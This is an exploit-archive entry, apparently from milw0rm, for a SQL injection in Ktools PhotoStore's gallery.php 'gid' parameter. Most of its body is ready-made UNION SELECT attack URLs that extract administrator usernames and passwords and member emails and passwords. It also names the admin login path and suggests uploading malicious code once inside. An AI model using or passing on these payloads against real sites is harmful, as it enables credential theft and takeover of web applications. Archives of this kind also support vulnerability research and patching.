Ktools Photostore 3.5.1 - 'gid' SQL Injection

Author: Mr.SQL
type: webapps
platform: php
port: 
date_added: 2008-05-08 
date_updated: 2016-11-28 
verified: 1 
codes: OSVDB-45142;CVE-2008-6649;OSVDB-45141;CVE-2008-6648;OSVDB-45140;CVE-2008-6647 
tags: 
aliases:  
screenshot_url:  
application_url: 

#########################################
# Remote SQL Injection Vulnerability    #
#                                       #
#  PhotoStore 3.4.3 ( gallery.php gid ) #
#                                       #
#########################################
## Script NAME  : PhotoStore
## VERSION : 3.4.3
## DOWNLOAD : http://www.ktools.net/
#########################################
## AuTh0r : Mr.SQL
## H0ME   : WwW.PaL-HaCkEr.CoM
## Email   : SQL@Hotmail.it
#########################################
## D0rk ::  n/a   ;)
################################################################################

## ExPlo!t For ADMIN INFO  :
===> http://www.exampel.com/gallery.php?gid=-9696'+UnIoN+SelecT+1,concat(username,0x3c7c7c204d722e53514c207c7c3e,password),3,4,5,6,7,8,9,10,1,12,13+from+mgr_users/*

#############

## Explo!T For Users INFO :
===> http://www.exampel.com/gallery.php?gid=-9696'+union+select+1,concat(email,'::Mr.SQL::',password),3,4,5,6,7,8,9,10,1,12,13+from+members/*

###################################################################################

===>> Admin P@nel
                    /manager/login.php

### N0TE ## YOU Can UploaD Your Ev!l Code  ADMIN CP
#############
<< Gr33Tz >>
Dark MaSTer :: HaCkEr-EGy :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: SecuritY FearS :: (( MuslimS HaCkErS ))
#####################################################

                                                                (( Geek InjEcT0r ))

# milw0rm.com [2008-05-09]